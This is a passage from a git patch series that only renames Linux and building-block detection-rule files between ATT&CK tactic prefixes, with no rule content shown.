rename from rules_building_block/command_and_control_bitsadmin_activity.toml
rename to rules_building_block/defense_evasion_bitsadmin_activity.toml
diff --git a/rules_building_block/initial_access_github_new_ip_address_for_pat.toml b/rules_building_block/defense_evasion_github_new_ip_address_for_pat.toml
similarity index 100%
rename from rules_building_block/initial_access_github_new_ip_address_for_pat.toml
rename to rules_building_block/defense_evasion_github_new_ip_address_for_pat.toml
diff --git a/rules_building_block/persistence_github_new_pat_for_user.toml b/rules_building_block/defense_evasion_github_new_pat_for_user.toml
similarity index 100%
rename from rules_building_block/persistence_github_new_pat_for_user.toml
rename to rules_building_block/defense_evasion_github_new_pat_for_user.toml
diff --git a/rules_building_block/discovery_linux_sysctl_enumeration.toml b/rules_building_block/defense_evasion_linux_sysctl_enumeration.toml
similarity index 100%
rename from rules_building_block/discovery_linux_sysctl_enumeration.toml
rename to rules_building_block/defense_evasion_linux_sysctl_enumeration.toml
diff --git a/rules_building_block/credential_access_mdmp_file_unusual_extension.toml b/rules_building_block/defense_evasion_mdmp_file_unusual_extension.toml
similarity index 100%
rename from rules_building_block/credential_access_mdmp_file_unusual_extension.toml
rename to rules_building_block/defense_evasion_mdmp_file_unusual_extension.toml
diff --git a/rules_building_block/execution_settingcontent_ms_file_creation.toml b/rules_building_block/defense_evasion_settingcontent_ms_file_creation.toml
similarity index 100%
rename from rules_building_block/execution_settingcontent_ms_file_creation.toml
rename to rules_building_block/defense_evasion_settingcontent_ms_file_creation.toml
diff --git a/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml b/rules_building_block/defense_evasion_sts_getsessiontoken_abuse.toml
similarity index 100%
rename from rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml
rename to rules_building_block/defense_evasion_sts_getsessiontoken_abuse.toml
diff --git a/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml b/rules_building_block/execution_anomalous_rsc_flight_data_patterns.toml
similarity index 100%
rename from rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml
rename to rules_building_block/execution_anomalous_rsc_flight_data_patterns.toml
diff --git a/rules_building_block/lateral_movement_at.toml b/rules_building_block/execution_at.toml
similarity index 100%
rename from rules_building_block/lateral_movement_at.toml
rename to rules_building_block/execution_at.toml
diff --git a/rules_building_block/defense_evasion_download_susp_extension.toml b/rules_building_block/execution_download_susp_extension.toml
similarity index 100%
rename from rules_building_block/defense_evasion_download_susp_extension.toml
rename to rules_building_block/execution_download_susp_extension.toml
diff --git a/rules_building_block/defense_evasion_injection_from_msoffice.toml b/rules_building_block/execution_injection_from_msoffice.toml
similarity index 100%
rename from rules_building_block/defense_evasion_injection_from_msoffice.toml
rename to rules_building_block/execution_injection_from_msoffice.toml
diff --git a/rules_building_block/defense_evasion_outlook_suspicious_child.toml b/rules_building_block/execution_outlook_suspicious_child.toml
similarity index 100%
rename from rules_building_block/defense_evasion_outlook_suspicious_child.toml
rename to rules_building_block/execution_outlook_suspicious_child.toml
diff --git a/rules_building_block/lateral_movement_posh_winrm_activity.toml b/rules_building_block/execution_posh_winrm_activity.toml
similarity index 100%
rename from rules_building_block/lateral_movement_posh_winrm_activity.toml
rename to rules_building_block/execution_posh_winrm_activity.toml
diff --git a/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml b/rules_building_block/execution_unusual_process_sql_accounts.toml
similarity index 100%
rename from rules_building_block/lateral_movement_unusual_process_sql_accounts.toml
rename to rules_building_block/execution_unusual_process_sql_accounts.toml
diff --git a/rules_building_block/lateral_movement_wmic_remote.toml b/rules_building_block/execution_wmic_remote.toml
similarity index 100%
rename from rules_building_block/lateral_movement_wmic_remote.toml
rename to rules_building_block/execution_wmic_remote.toml
diff --git a/rules_building_block/credential_access_entra_id_risk_detection_signal.toml b/rules_building_block/initial_access_entra_id_risk_detection_signal.toml
similarity index 100%
rename from rules_building_block/credential_access_entra_id_risk_detection_signal.toml
rename to rules_building_block/initial_access_entra_id_risk_detection_signal.toml
diff --git a/rules_building_block/persistence_web_server_potential_sql_injection.toml b/rules_building_block/initial_access_web_server_potential_sql_injection.toml
similarity index 100%
rename from rules_building_block/persistence_web_server_potential_sql_injection.toml
rename to rules_building_block/initial_access_web_server_potential_sql_injection.toml
diff --git a/rules_building_block/execution_github_new_event_action_for_pat.toml b/rules_building_block/persistence_github_new_event_action_for_pat.toml
similarity index 100%
rename from rules_building_block/execution_github_new_event_action_for_pat.toml
rename to rules_building_block/persistence_github_new_event_action_for_pat.toml
diff --git a/rules_building_block/discovery_linux_modprobe_enumeration.toml b/rules_building_block/persistence_linux_modprobe_enumeration.toml
similarity index 100%
rename from rules_building_block/discovery_linux_modprobe_enumeration.toml
rename to rules_building_block/persistence_linux_modprobe_enumeration.toml
diff --git a/rules_building_block/defense_evasion_service_path_registry.toml b/rules_building_block/persistence_service_path_registry.toml
similarity index 100%
rename from rules_building_block/defense_evasion_service_path_registry.toml
rename to rules_building_block/persistence_service_path_registry.toml
diff --git a/rules_building_block/defense_evasion_services_exe_path.toml b/rules_building_block/persistence_services_exe_path.toml
similarity index 100%
rename from rules_building_block/defense_evasion_services_exe_path.toml
rename to rules_building_block/persistence_services_exe_path.toml
diff --git a/rules_building_block/defense_evasion_write_dac_access.toml b/rules_building_block/persistence_write_dac_access.toml
similarity index 100%
rename from rules_building_block/defense_evasion_write_dac_access.toml
rename to rules_building_block/persistence_write_dac_access.toml
diff --git a/rules_building_block/execution_github_repo_created.toml b/rules_building_block/resource_development_github_repo_created.toml
similarity index 100%
rename from rules_building_block/execution_github_repo_created.toml
rename to rules_building_block/resource_development_github_repo_created.toml
From cb16aeea8daba2374b2f347ca89ea883869c019b Mon Sep 17 00:00:00 2001
From: Ruben Groenewoud
Date: Tue, 24 Mar 2026 11:15:08 +0100
Subject: [PATCH 07/16] Revert "__"
This reverts commit 9ae86ae3b410aa5c5a8b2df2a5f770fdb10bae26.
---
 ...on.toml => command_and_control_cupsd_foomatic_rip_netcon.toml} | 0
 ..._netcon.toml => command_and_control_linux_kworker_netcon.toml} | 0
 ...les.toml => credential_access_collection_sensitive_files.toml} | 0
 ..._collection_sensitive_files_compression_inside_container.toml} | 0
 ...ss_hooking.toml => credential_access_gdb_process_hooking.toml} | 0
 ...on.toml => defense_evasion_authorized_keys_file_deletion.toml} | 0
 ...toml => defense_evasion_curl_or_wget_executed_via_lolbin.toml} | 0
 ...ml => defense_evasion_interactive_shell_from_system_user.toml} | 0
 ...ce_ld_so_creation.toml => defense_evasion_ld_so_creation.toml} | 0
 ...ame_esxi_files.toml => defense_evasion_rename_esxi_files.toml} | 0
 ..._deletion.toml => defense_evasion_user_or_group_deletion.toml} | 0
 ...le_discovery.toml => discovery_kubeconfig_file_discovery.toml} | 0
 ...oml => discovery_private_key_password_searching_activity.toml} | 0
 ...oml => discovery_security_file_access_via_common_utility.toml} | 0
 ...covery_suspicious_network_tool_launched_inside_container.toml} | 0
 ...rinting.toml => discovery_virtual_machine_fingerprinting.toml} | 0
 ...eated.toml => execution_abnormal_process_id_file_created.toml} | 0
 ...
execution_cupsd_foomatic_rip_suspicious_child_execution.toml} | 0
 ...execution_egress_connection_from_entrypoint_in_container.toml} | 0
 ...on.toml => execution_file_execution_followed_by_deletion.toml} | 0
 ...xecution_file_made_executable_via_chmod_inside_container.toml} | 0
 ...ecution_file_transfer_or_listener_established_via_netcat.toml} | 0
 ...execution_kubernetes_direct_api_request_via_curl_or_wget.toml} | 0
 ...ener_via_rlwrap.toml => execution_nc_listener_via_rlwrap.toml} | 0
 ...nary.toml => execution_netcon_from_rwx_mem_region_binary.toml} | 0
 ...ilation.toml => execution_network_event_post_compilation.toml} | 0
 ..._executed.toml => execution_potential_hack_tool_executed.toml} | 0
 ...toml => execution_process_backgrounded_by_unusual_parent.toml} | 0
 ...e.toml => execution_process_started_from_process_id_file.toml} | 0
 ... => execution_process_started_in_shared_memory_directory.toml} | 0
 ...inux_binary.toml => execution_shell_evasion_linux_binary.toml} | 0
 ..._server.toml => execution_shell_openssl_client_or_server.toml} | 0
 ...d_process.toml => execution_shell_via_background_process.toml} | 0
 ...inux.toml => execution_shell_via_child_tcp_utility_linux.toml} | 0
 ...nux.toml => execution_shell_via_lolbin_interpreter_linux.toml} | 0
 ...eter_linux.toml => execution_shell_via_meterpreter_linux.toml} | 0
 ...ous_binary.toml => execution_shell_via_suspicious_binary.toml} | 0
 ..._linux.toml => execution_shell_via_tcp_cli_utility_linux.toml} | 0
 ..._linux.toml => execution_shell_via_udp_cli_utility_linux.toml} | 0
 ...=> execution_sus_extraction_or_decrompression_via_funzip.toml} | 0
 ...
execution_suspicious_executable_running_system_commands.toml} | 0
 ...l => execution_suspicious_mining_process_creation_events.toml} | 0
 ...e.toml => execution_system_binary_file_permission_change.toml} | 0
 ...se_evasion_tc_bpf_filter.toml => execution_tc_bpf_filter.toml} | 0
 ...d_execution.toml => execution_unusual_kthreadd_execution.toml} | 0
 ...l => execution_unusual_path_invocation_from_command_line.toml} | 0
 ...xec_execution.toml => execution_unusual_pkexec_execution.toml} | 0
 ..._dumping.toml => exfiltration_potential_database_dumping.toml} | 0
 ...on.toml => impact_potential_bruteforce_malware_infection.toml} | 0
 ...tivity.toml => lateral_movement_kubeconfig_file_activity.toml} | 0
 ...m_download.toml => lateral_movement_ssh_it_worm_download.toml} | 0
 ...oml => lateral_movement_telnet_network_activity_external.toml} | 0
 ...cution.toml => persistence_apt_package_manager_execution.toml} | 0
 ...er_netcon.toml => persistence_apt_package_manager_netcon.toml} | 0
 ...tion_at_job_creation.toml => persistence_at_job_creation.toml} | 0
 ...vasion_boot_file_copy.toml => persistence_boot_file_copy.toml} | 0
 ...robe_write_user.toml => persistence_bpf_probe_write_user.toml} | 0
 ..._or_map_load.toml => persistence_bpf_program_or_map_load.toml} | 0
 ...oml => persistence_credential_access_modify_ssh_binaries.toml} | 0
 ..._cron_job_creation.toml => persistence_cron_job_creation.toml} | 0
 ....toml => persistence_dbus_unsual_daemon_parent_execution.toml} | 0
 ...it_hook_execution.toml => persistence_git_hook_execution.toml} | 0
 ...trol_git_hook_netcon.toml => persistence_git_hook_netcon.toml} | 0
 ...execution.toml => persistence_git_hook_process_execution.toml} | 0
 ...odule_load.toml => persistence_insmod_kernel_module_load.toml} | 0
 ...ernel_driver_load.toml => persistence_kernel_driver_load.toml} | 0
 ..._root.toml => persistence_kernel_driver_load_by_non_root.toml} | 0
 ...
=> persistence_kernel_module_load_from_unusual_location.toml} | 0
 ..._file_creation.toml => persistence_kworker_file_creation.toml} | 0
 ....toml => persistence_linux_shell_activity_via_web_server.toml} | 0
 ... => persistence_pluggable_authentication_module_creation.toml} | 0
 ..._pluggable_authentication_module_creation_in_unusual_dir.toml} | 0
 ...sistence_pluggable_authentication_module_source_download.toml} | 0
 ...ap.toml => persistence_process_capability_set_via_setcap.toml} | 0
 ...ity_set.toml => persistence_setuid_setgid_capability_set.toml} | 0
 ...ject_creation.toml => persistence_shared_object_creation.toml} | 0
 ...oml => persistence_simple_web_server_connection_accepted.toml} | 0
 ..._user.toml => persistence_ssh_via_backdoored_system_user.toml} | 0
 ....toml => persistence_suspicious_ssh_execution_xzbackdoor.toml} | 0
 ...ontrol_systemd_netcon.toml => persistence_systemd_netcon.toml} | 0
 ...vice_started.toml => persistence_systemd_service_started.toml} | 0
 ...ll_execution.toml => persistence_systemd_shell_execution.toml} | 0
 ..._process.toml => persistence_unusual_exim4_child_process.toml} | 0
 ...sual_pam_grantor.toml => persistence_unusual_pam_grantor.toml} | 0
 ...d_process.toml => persistence_unusual_sshd_child_process.toml} | 0
 ...spawned.toml => persistence_web_server_sus_child_spawned.toml} | 0
 ...ion.toml => persistence_web_server_sus_command_execution.toml} | 0
 ...port.toml => persistence_web_server_sus_destination_port.toml} | 0
 ...toml => persistence_web_server_unusual_command_execution.toml} | 0
 ... privilege_escalation_chown_chmod_unauthorized_file_read.toml} | 0
 ...permissions.toml => privilege_escalation_dac_permissions.toml} | 0
 ...ation.toml => privilege_escalation_kworker_uid_elevation.toml} | 0
 ...l => privilege_escalation_ld_preload_shared_object_modif.toml} | 0
 ...l => privilege_escalation_linux_suspicious_symbolic_link.toml} | 0
 ...privilege_escalation_load_and_unload_of_kernel_via_kexec.toml} | 0
 ...
=> privilege_escalation_potential_bufferoverflow_attack.toml} | 0
 ...l => privilege_escalation_potential_wildcard_shell_spawn.toml} | 0
 ...oot.toml => privilege_escalation_sda_disk_mount_non_root.toml} | 0
 ..._file_read.toml => privilege_escalation_shadow_file_read.toml} | 0
 ...do_hijacking.toml => privilege_escalation_sudo_hijacking.toml} | 0
 ...> privilege_escalation_suspicious_chown_fowner_elevation.toml} | 0
 ...oml => privilege_escalation_suspicious_passwd_file_write.toml} | 0
 102 files changed, 0 insertions(+), 0 deletions(-)
 rename rules/linux/{execution_cupsd_foomatic_rip_netcon.toml => command_and_control_cupsd_foomatic_rip_netcon.toml} (100%)
 rename rules/linux/{defense_evasion_linux_kworker_netcon.toml => command_and_control_linux_kworker_netcon.toml} (100%)
 rename rules/linux/{collection_sensitive_files.toml => credential_access_collection_sensitive_files.toml} (100%)
 rename rules/linux/{collection_sensitive_files_compression_inside_container.toml => credential_access_collection_sensitive_files_compression_inside_container.toml} (100%)
 rename rules/linux/{collection_gdb_process_hooking.toml => credential_access_gdb_process_hooking.toml} (100%)
 rename rules/linux/{impact_authorized_keys_file_deletion.toml => defense_evasion_authorized_keys_file_deletion.toml} (100%)
 rename rules/linux/{command_and_control_curl_or_wget_executed_via_lolbin.toml => defense_evasion_curl_or_wget_executed_via_lolbin.toml} (100%)
 rename rules/linux/{execution_interactive_shell_from_system_user.toml => defense_evasion_interactive_shell_from_system_user.toml} (100%)
 rename rules/linux/{persistence_ld_so_creation.toml => defense_evasion_ld_so_creation.toml} (100%)
 rename rules/linux/{impact_rename_esxi_files.toml => defense_evasion_rename_esxi_files.toml} (100%)
 rename rules/linux/{impact_user_or_group_deletion.toml => defense_evasion_user_or_group_deletion.toml} (100%)
 rename rules/linux/{credential_access_kubeconfig_file_discovery.toml => discovery_kubeconfig_file_discovery.toml}
(100%)
 rename rules/linux/{credential_access_private_key_password_searching_activity.toml => discovery_private_key_password_searching_activity.toml} (100%)
 rename rules/linux/{credential_access_security_file_access_via_common_utility.toml => discovery_security_file_access_via_common_utility.toml} (100%)
 rename rules/linux/{credential_access_suspicious_network_tool_launched_inside_container.toml => discovery_suspicious_network_tool_launched_inside_container.toml} (100%)
 rename rules/linux/{defense_evasion_virtual_machine_fingerprinting.toml => discovery_virtual_machine_fingerprinting.toml} (100%)
 rename rules/linux/{defense_evasion_abnormal_process_id_file_created.toml => execution_abnormal_process_id_file_created.toml} (100%)
 rename rules/linux/{command_and_control_cupsd_foomatic_rip_suspicious_child_execution.toml => execution_cupsd_foomatic_rip_suspicious_child_execution.toml} (100%)
 rename rules/linux/{command_and_control_egress_connection_from_entrypoint_in_container.toml => execution_egress_connection_from_entrypoint_in_container.toml} (100%)
 rename rules/linux/{command_and_control_file_execution_followed_by_deletion.toml => execution_file_execution_followed_by_deletion.toml} (100%)
 rename rules/linux/{defense_evasion_file_made_executable_via_chmod_inside_container.toml => execution_file_made_executable_via_chmod_inside_container.toml} (100%)
 rename rules/linux/{command_and_control_file_transfer_or_listener_established_via_netcat.toml => execution_file_transfer_or_listener_established_via_netcat.toml} (100%)
 rename rules/linux/{credential_access_kubernetes_direct_api_request_via_curl_or_wget.toml => execution_kubernetes_direct_api_request_via_curl_or_wget.toml} (100%)
 rename rules/linux/{command_and_control_nc_listener_via_rlwrap.toml => execution_nc_listener_via_rlwrap.toml} (100%)
 rename rules/linux/{defense_evasion_netcon_from_rwx_mem_region_binary.toml => execution_netcon_from_rwx_mem_region_binary.toml} (100%)
 rename
rules/linux/{command_and_control_network_event_post_compilation.toml => execution_network_event_post_compilation.toml} (100%)
 rename rules/linux/{credential_access_potential_hack_tool_executed.toml => execution_potential_hack_tool_executed.toml} (100%)
 rename rules/linux/{defense_evasion_process_backgrounded_by_unusual_parent.toml => execution_process_backgrounded_by_unusual_parent.toml} (100%)
 rename rules/linux/{defense_evasion_process_started_from_process_id_file.toml => execution_process_started_from_process_id_file.toml} (100%)
 rename rules/linux/{defense_evasion_process_started_in_shared_memory_directory.toml => execution_process_started_in_shared_memory_directory.toml} (100%)
 rename rules/linux/{defense_evasion_shell_evasion_linux_binary.toml => execution_shell_evasion_linux_binary.toml} (100%)
 rename rules/linux/{command_and_control_shell_openssl_client_or_server.toml => execution_shell_openssl_client_or_server.toml} (100%)
 rename rules/linux/{command_and_control_shell_via_background_process.toml => execution_shell_via_background_process.toml} (100%)
 rename rules/linux/{command_and_control_shell_via_child_tcp_utility_linux.toml => execution_shell_via_child_tcp_utility_linux.toml} (100%)
 rename rules/linux/{command_and_control_shell_via_lolbin_interpreter_linux.toml => execution_shell_via_lolbin_interpreter_linux.toml} (100%)
 rename rules/linux/{discovery_shell_via_meterpreter_linux.toml => execution_shell_via_meterpreter_linux.toml} (100%)
 rename rules/linux/{command_and_control_shell_via_suspicious_binary.toml => execution_shell_via_suspicious_binary.toml} (100%)
 rename rules/linux/{command_and_control_shell_via_tcp_cli_utility_linux.toml => execution_shell_via_tcp_cli_utility_linux.toml} (100%)
 rename rules/linux/{command_and_control_shell_via_udp_cli_utility_linux.toml => execution_shell_via_udp_cli_utility_linux.toml} (100%)
 rename rules/linux/{defense_evasion_sus_extraction_or_decrompression_via_funzip.toml =>
execution_sus_extraction_or_decrompression_via_funzip.toml} (100%)
 rename rules/linux/{discovery_suspicious_executable_running_system_commands.toml => execution_suspicious_executable_running_system_commands.toml} (100%)
 rename rules/linux/{impact_suspicious_mining_process_creation_events.toml => execution_suspicious_mining_process_creation_events.toml} (100%)
 rename rules/linux/{defense_evasion_system_binary_file_permission_change.toml => execution_system_binary_file_permission_change.toml} (100%)
 rename rules/linux/{defense_evasion_tc_bpf_filter.toml => execution_tc_bpf_filter.toml} (100%)
 rename rules/linux/{defense_evasion_unusual_kthreadd_execution.toml => execution_unusual_kthreadd_execution.toml} (100%)
 rename rules/linux/{defense_evasion_unusual_path_invocation_from_command_line.toml => execution_unusual_path_invocation_from_command_line.toml} (100%)
 rename rules/linux/{privilege_escalation_unusual_pkexec_execution.toml => execution_unusual_pkexec_execution.toml} (100%)
 rename rules/linux/{collection_potential_database_dumping.toml => exfiltration_potential_database_dumping.toml} (100%)
 rename rules/linux/{credential_access_potential_bruteforce_malware_infection.toml => impact_potential_bruteforce_malware_infection.toml} (100%)
 rename rules/linux/{credential_access_kubeconfig_file_activity.toml => lateral_movement_kubeconfig_file_activity.toml} (100%)
 rename rules/linux/{command_and_control_ssh_it_worm_download.toml => lateral_movement_ssh_it_worm_download.toml} (100%)
 rename rules/linux/{command_and_control_telnet_network_activity_external.toml => lateral_movement_telnet_network_activity_external.toml} (100%)
 rename rules/linux/{execution_apt_package_manager_execution.toml => persistence_apt_package_manager_execution.toml} (100%)
 rename rules/linux/{execution_apt_package_manager_netcon.toml => persistence_apt_package_manager_netcon.toml} (100%)
 rename rules/linux/{execution_at_job_creation.toml => persistence_at_job_creation.toml} (100%)
 rename
rules/linux/{defense_evasion_boot_file_copy.toml => persistence_boot_file_copy.toml} (100%)
 rename rules/linux/{defense_evasion_bpf_probe_write_user.toml => persistence_bpf_probe_write_user.toml} (100%)
 rename rules/linux/{defense_evasion_bpf_program_or_map_load.toml => persistence_bpf_program_or_map_load.toml} (100%)
 rename rules/linux/{credential_access_modify_ssh_binaries.toml => persistence_credential_access_modify_ssh_binaries.toml} (100%)
 rename rules/linux/{execution_cron_job_creation.toml => persistence_cron_job_creation.toml} (100%)
 rename rules/linux/{execution_dbus_unsual_daemon_parent_execution.toml => persistence_dbus_unsual_daemon_parent_execution.toml} (100%)
 rename rules/linux/{execution_git_hook_execution.toml => persistence_git_hook_execution.toml} (100%)
 rename rules/linux/{command_and_control_git_hook_netcon.toml => persistence_git_hook_netcon.toml} (100%)
 rename rules/linux/{execution_git_hook_process_execution.toml => persistence_git_hook_process_execution.toml} (100%)
 rename rules/linux/{defense_evasion_insmod_kernel_module_load.toml => persistence_insmod_kernel_module_load.toml} (100%)
 rename rules/linux/{defense_evasion_kernel_driver_load.toml => persistence_kernel_driver_load.toml} (100%)
 rename rules/linux/{defense_evasion_kernel_driver_load_by_non_root.toml => persistence_kernel_driver_load_by_non_root.toml} (100%)
 rename rules/linux/{defense_evasion_kernel_module_load_from_unusual_location.toml => persistence_kernel_module_load_from_unusual_location.toml} (100%)
 rename rules/linux/{defense_evasion_kworker_file_creation.toml => persistence_kworker_file_creation.toml} (100%)
 rename rules/linux/{initial_access_linux_shell_activity_via_web_server.toml => persistence_linux_shell_activity_via_web_server.toml} (100%)
 rename rules/linux/{credential_access_pluggable_authentication_module_creation.toml => persistence_pluggable_authentication_module_creation.toml} (100%)
 rename
rules/linux/{credential_access_pluggable_authentication_module_creation_in_unusual_dir.toml => persistence_pluggable_authentication_module_creation_in_unusual_dir.toml} (100%)
 rename rules/linux/{command_and_control_pluggable_authentication_module_source_download.toml => persistence_pluggable_authentication_module_source_download.toml} (100%)
 rename rules/linux/{privilege_escalation_process_capability_set_via_setcap.toml => persistence_process_capability_set_via_setcap.toml} (100%)
 rename rules/linux/{privilege_escalation_setuid_setgid_capability_set.toml => persistence_setuid_setgid_capability_set.toml} (100%)
 rename rules/linux/{defense_evasion_shared_object_creation.toml => persistence_shared_object_creation.toml} (100%)
 rename rules/linux/{command_and_control_simple_web_server_connection_accepted.toml => persistence_simple_web_server_connection_accepted.toml} (100%)
 rename rules/linux/{initial_access_ssh_via_backdoored_system_user.toml => persistence_ssh_via_backdoored_system_user.toml} (100%)
 rename rules/linux/{execution_suspicious_ssh_execution_xzbackdoor.toml => persistence_suspicious_ssh_execution_xzbackdoor.toml} (100%)
 rename rules/linux/{command_and_control_systemd_netcon.toml => persistence_systemd_netcon.toml} (100%)
 rename rules/linux/{execution_systemd_service_started.toml => persistence_systemd_service_started.toml} (100%)
 rename rules/linux/{execution_systemd_shell_execution.toml => persistence_systemd_shell_execution.toml} (100%)
 rename rules/linux/{execution_unusual_exim4_child_process.toml => persistence_unusual_exim4_child_process.toml} (100%)
 rename rules/linux/{defense_evasion_unusual_pam_grantor.toml => persistence_unusual_pam_grantor.toml} (100%)
 rename rules/linux/{lateral_movement_unusual_sshd_child_process.toml => persistence_unusual_sshd_child_process.toml} (100%)
 rename rules/linux/{execution_web_server_sus_child_spawned.toml => persistence_web_server_sus_child_spawned.toml} (100%)
 rename
rules/linux/{execution_web_server_sus_command_execution.toml => persistence_web_server_sus_command_execution.toml} (100%)
 rename rules/linux/{command_and_control_web_server_sus_destination_port.toml => persistence_web_server_sus_destination_port.toml} (100%)
 rename rules/linux/{execution_web_server_unusual_command_execution.toml => persistence_web_server_unusual_command_execution.toml} (100%)
 rename rules/linux/{defense_evasion_chown_chmod_unauthorized_file_read.toml => privilege_escalation_chown_chmod_unauthorized_file_read.toml} (100%)
 rename rules/linux/{credential_access_dac_permissions.toml => privilege_escalation_dac_permissions.toml} (100%)
 rename rules/linux/{defense_evasion_kworker_uid_elevation.toml => privilege_escalation_kworker_uid_elevation.toml} (100%)
 rename rules/linux/{persistence_ld_preload_shared_object_modif.toml => privilege_escalation_ld_preload_shared_object_modif.toml} (100%)
 rename rules/linux/{persistence_linux_suspicious_symbolic_link.toml => privilege_escalation_linux_suspicious_symbolic_link.toml} (100%)
 rename rules/linux/{defense_evasion_load_and_unload_of_kernel_via_kexec.toml => privilege_escalation_load_and_unload_of_kernel_via_kexec.toml} (100%)
 rename rules/linux/{initial_access_potential_bufferoverflow_attack.toml => privilege_escalation_potential_bufferoverflow_attack.toml} (100%)
 rename rules/linux/{execution_potential_wildcard_shell_spawn.toml => privilege_escalation_potential_wildcard_shell_spawn.toml} (100%)
 rename rules/linux/{defense_evasion_sda_disk_mount_non_root.toml => privilege_escalation_sda_disk_mount_non_root.toml} (100%)
 rename rules/linux/{credential_access_shadow_file_read.toml => privilege_escalation_shadow_file_read.toml} (100%)
 rename rules/linux/{persistence_sudo_hijacking.toml => privilege_escalation_sudo_hijacking.toml} (100%)
 rename rules/linux/{defense_evasion_suspicious_chown_fowner_elevation.toml => privilege_escalation_suspicious_chown_fowner_elevation.toml} (100%)
 rename
rules/linux/{persistence_suspicious_passwd_file_write.toml => privilege_escalation_suspicious_passwd_file_write.toml} (100%)
diff --git a/rules/linux/execution_cupsd_foomatic_rip_netcon.toml b/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml
similarity index 100%
rename from rules/linux/execution_cupsd_foomatic_rip_netcon.toml
rename to rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml
diff --git a/rules/linux/defense_evasion_linux_kworker_netcon.toml b/rules/linux/command_and_control_linux_kworker_netcon.toml
similarity index 100%
rename from rules/linux/defense_evasion_linux_kworker_netcon.toml
rename to rules/linux/command_and_control_linux_kworker_netcon.toml
diff --git a/rules/linux/collection_sensitive_files.toml b/rules/linux/credential_access_collection_sensitive_files.toml
similarity index 100%
rename from rules/linux/collection_sensitive_files.toml
rename to rules/linux/credential_access_collection_sensitive_files.toml
diff --git a/rules/linux/collection_sensitive_files_compression_inside_container.toml b/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml
similarity index 100%
rename from rules/linux/collection_sensitive_files_compression_inside_container.toml
rename to rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml
diff --git a/rules/linux/collection_gdb_process_hooking.toml b/rules/linux/credential_access_gdb_process_hooking.toml
similarity index 100%
rename from rules/linux/collection_gdb_process_hooking.toml
rename to rules/linux/credential_access_gdb_process_hooking.toml
diff --git a/rules/linux/impact_authorized_keys_file_deletion.toml b/rules/linux/defense_evasion_authorized_keys_file_deletion.toml
similarity index 100%
rename from rules/linux/impact_authorized_keys_file_deletion.toml
rename to rules/linux/defense_evasion_authorized_keys_file_deletion.toml
diff --git a/rules/linux/command_and_control_curl_or_wget_executed_via_lolbin.toml b/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml
similarity index 100%
rename from rules/linux/command_and_control_curl_or_wget_executed_via_lolbin.toml
rename to rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml
diff --git a/rules/linux/execution_interactive_shell_from_system_user.toml b/rules/linux/defense_evasion_interactive_shell_from_system_user.toml
similarity index 100%
rename from rules/linux/execution_interactive_shell_from_system_user.toml
rename to rules/linux/defense_evasion_interactive_shell_from_system_user.toml
diff --git a/rules/linux/persistence_ld_so_creation.toml b/rules/linux/defense_evasion_ld_so_creation.toml
similarity index 100%
rename from rules/linux/persistence_ld_so_creation.toml
rename to rules/linux/defense_evasion_ld_so_creation.toml
diff --git a/rules/linux/impact_rename_esxi_files.toml b/rules/linux/defense_evasion_rename_esxi_files.toml
similarity index 100%
rename from rules/linux/impact_rename_esxi_files.toml
rename to rules/linux/defense_evasion_rename_esxi_files.toml
diff --git a/rules/linux/impact_user_or_group_deletion.toml b/rules/linux/defense_evasion_user_or_group_deletion.toml
similarity index 100%
rename from rules/linux/impact_user_or_group_deletion.toml
rename to rules/linux/defense_evasion_user_or_group_deletion.toml
diff --git a/rules/linux/credential_access_kubeconfig_file_discovery.toml b/rules/linux/discovery_kubeconfig_file_discovery.toml
similarity index 100%
rename from rules/linux/credential_access_kubeconfig_file_discovery.toml
rename to rules/linux/discovery_kubeconfig_file_discovery.toml
diff --git a/rules/linux/credential_access_private_key_password_searching_activity.toml b/rules/linux/discovery_private_key_password_searching_activity.toml
similarity index 100%
rename from rules/linux/credential_access_private_key_password_searching_activity.toml
rename to rules/linux/discovery_private_key_password_searching_activity.toml
diff --git a/rules/linux/credential_access_security_file_access_via_common_utility.toml b/rules/linux/discovery_security_file_access_via_common_utility.toml
similarity index 100%
rename from rules/linux/credential_access_security_file_access_via_common_utility.toml
rename to rules/linux/discovery_security_file_access_via_common_utility.toml
diff --git a/rules/linux/credential_access_suspicious_network_tool_launched_inside_container.toml b/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml
similarity index 100%
rename from rules/linux/credential_access_suspicious_network_tool_launched_inside_container.toml
rename to rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml
diff --git a/rules/linux/defense_evasion_virtual_machine_fingerprinting.toml b/rules/linux/discovery_virtual_machine_fingerprinting.toml
similarity index 100%
rename from rules/linux/defense_evasion_virtual_machine_fingerprinting.toml
rename to rules/linux/discovery_virtual_machine_fingerprinting.toml
diff --git a/rules/linux/defense_evasion_abnormal_process_id_file_created.toml b/rules/linux/execution_abnormal_process_id_file_created.toml
similarity index 100%
rename from rules/linux/defense_evasion_abnormal_process_id_file_created.toml
rename to rules/linux/execution_abnormal_process_id_file_created.toml
diff --git a/rules/linux/command_and_control_cupsd_foomatic_rip_suspicious_child_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml
similarity index 100%
rename from rules/linux/command_and_control_cupsd_foomatic_rip_suspicious_child_execution.toml
rename to rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml
diff --git a/rules/linux/command_and_control_egress_connection_from_entrypoint_in_container.toml b/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml
similarity index 100%
rename from rules/linux/command_and_control_egress_connection_from_entrypoint_in_container.toml
rename to rules/linux/execution_egress_connection_from_entrypoint_in_container.toml
diff --git a/rules/linux/command_and_control_file_execution_followed_by_deletion.toml b/rules/linux/execution_file_execution_followed_by_deletion.toml
similarity index 100%
rename from rules/linux/command_and_control_file_execution_followed_by_deletion.toml
rename to rules/linux/execution_file_execution_followed_by_deletion.toml
diff --git a/rules/linux/defense_evasion_file_made_executable_via_chmod_inside_container.toml b/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml
similarity index 100%
